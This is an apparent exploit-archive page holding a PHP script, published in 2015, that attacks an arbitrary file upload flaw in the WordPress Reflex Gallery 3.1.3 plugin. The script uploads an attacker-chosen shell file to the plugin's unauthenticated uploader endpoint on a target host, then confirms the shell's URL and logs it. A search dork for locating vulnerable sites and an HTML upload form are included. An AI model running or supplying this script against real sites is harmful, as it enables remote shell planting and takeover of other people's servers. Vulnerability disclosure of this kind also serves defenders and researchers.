exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

WordPress Reflex Gallery 3.1.3 Shell Upload

WordPress Reflex Gallery 3.1.3 Shell Upload
Posted Mar 16, 2015
Authored by Cleiton Pinheiro

WordPress Reflex Gallery plugin version 3.1.3 suffers from a remote shell upload vulnerability.

tags | exploit, remote, shell
SHA-256 | 6f6077fb138d9af502aa58092022e9d24de2532b93fddc77dd4cb542c63ea916

WordPress Reflex Gallery 3.1.3 Shell Upload

Change Mirror Download
<?php

/*
# Exploit Title: Wordpress Plugin Reflex Gallery - Arbitrary File Upload
# TIPE: Arbitrary File Upload
# Google DORK: inurl:"wp-content/plugins/reflex-gallery/"
# Vendor: https://wordpress.org/plugins/reflex-gallery/
# Tested on: Linux
# Version: 3.1.3 (Last)
# EXECUTE: php exploit.php www.alvo.com.br shell.php
# OUTPUT: Exploit_AFU.txt
# POC http://i.imgur.com/mpjXaZ9.png
# REF COD http://1337day.com/exploit/23369

--------------------------------------------------------------------------------
<form method = "POST" action = "" enctype = "multipart/form-data" >
<input type = "file" name = "qqfile"><br>
<input type = "submit" name = "Submit" value = "Pwn!">
</form >

--------------------------------------------------------------------------------

# AUTOR: Cleiton Pinheiro / Nick: googleINURL
# Blog: http://blog.inurl.com.br
# Twitter: https://twitter.com/googleinurl
# Fanpage: https://fb.com/InurlBrasil
# Pastebin http://pastebin.com/u/Googleinurl
# GIT: https://github.com/googleinurl
# PSS: http://packetstormsecurity.com/user/googleinurl/
# YOUTUBE https://www.youtube.com/channel/UCFP-WEzs5Ikdqw0HBLImGGA
*/

error_reporting(1);
set_time_limit(0);
ini_set('display_errors', 1);
ini_set('max_execution_time', 0);
ini_set('allow_url_fopen', 1);
ob_implicit_flush(true);
ob_end_flush();

function __plus() {

ob_flush();
flush();
}

function __request($params) {

$objcurl = curl_init();
curl_setopt($objcurl, CURLOPT_URL,
"{$params['host']}/wp-content/plugins/reflex-gallery/admin/scripts/FileUploader/php.php?Year=2015&Month=03");
curl_setopt($objcurl, CURLOPT_POST, 1);
curl_setopt($objcurl, CURLOPT_HEADER, 1);
curl_setopt($objcurl, CURLOPT_REFERER, $params['host']);
curl_setopt($objcurl, CURLOPT_POSTFIELDS, array('qqfile' =>
"@{$params['file']}"));
curl_setopt($objcurl, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($objcurl, CURLOPT_CONNECTTIMEOUT, 10);
curl_setopt($objcurl, CURLOPT_RETURNTRANSFER, 1);
$info['corpo'] = curl_exec($objcurl) . __plus();
$info['server'] = curl_getinfo($objcurl) . __plus();
curl_close($objcurl) . __plus();
return $info;
}

echo "[+] Wordpress Plugin Reflex Gallery - Arbitrary File Upload
Vulnerability\n\n";
$params = array('file' => isset($argv[2]) ? $argv[2] : exit("\n0x[ERRO]
DEFINE FILE SHELL!\n"), 'host' => isset($argv[1]) ? (strstr($argv[1],
'http') ? $argv[1] : "http://{$argv[1]}") : exit("\n0x[ERRO] DEFINE
TARGET!\n"));
__request($params) . __plus();
$_s = "{$params['host']}/wp-content/uploads/2015/03/{$params['file']}";
$_h =
get_headers("{$params['host']}/wp-content/uploads/2015/03/{$params['file']}",
1);
foreach ($_h as $key => $value) {
echo date("h:m:s") . " [INFO][{$key}]:: {$value}\n";
}
$_x = (strstr(($_h[0] . (isset($_h[1]) ? $_h[1] : NULL)), '200'));
print "\n" . date("h:m:s") . " [INFO][COD]:: " . (!empty($_x) ? '[+] VULL'
: '[-] NOT VULL');
print "\n" . date("h:m:s") . " [INFO][SHELL]:: " . (!empty($_x) ? "[+]
{$_s}" . file_put_contents("Exploit_AFU.txt", "{$_s}\n\n", FILE_APPEND) :
'[-] ERROR!');
Login or Register to add favorites

File Archive:

February 2023

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Feb 1st
    11 Files
  • 2
    Feb 2nd
    9 Files
  • 3
    Feb 3rd
    0 Files
  • 4
    Feb 4th
    0 Files
  • 5
    Feb 5th
    0 Files
  • 6
    Feb 6th
    0 Files
  • 7
    Feb 7th
    0 Files
  • 8
    Feb 8th
    0 Files
  • 9
    Feb 9th
    0 Files
  • 10
    Feb 10th
    0 Files
  • 11
    Feb 11th
    0 Files
  • 12
    Feb 12th
    0 Files
  • 13
    Feb 13th
    0 Files
  • 14
    Feb 14th
    0 Files
  • 15
    Feb 15th
    0 Files
  • 16
    Feb 16th
    0 Files
  • 17
    Feb 17th
    0 Files
  • 18
    Feb 18th
    0 Files
  • 19
    Feb 19th
    0 Files
  • 20
    Feb 20th
    0 Files
  • 21
    Feb 21st
    0 Files
  • 22
    Feb 22nd
    0 Files
  • 23
    Feb 23rd
    0 Files
  • 24
    Feb 24th
    0 Files
  • 25
    Feb 25th
    0 Files
  • 26
    Feb 26th
    0 Files
  • 27
    Feb 27th
    0 Files
  • 28
    Feb 28th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close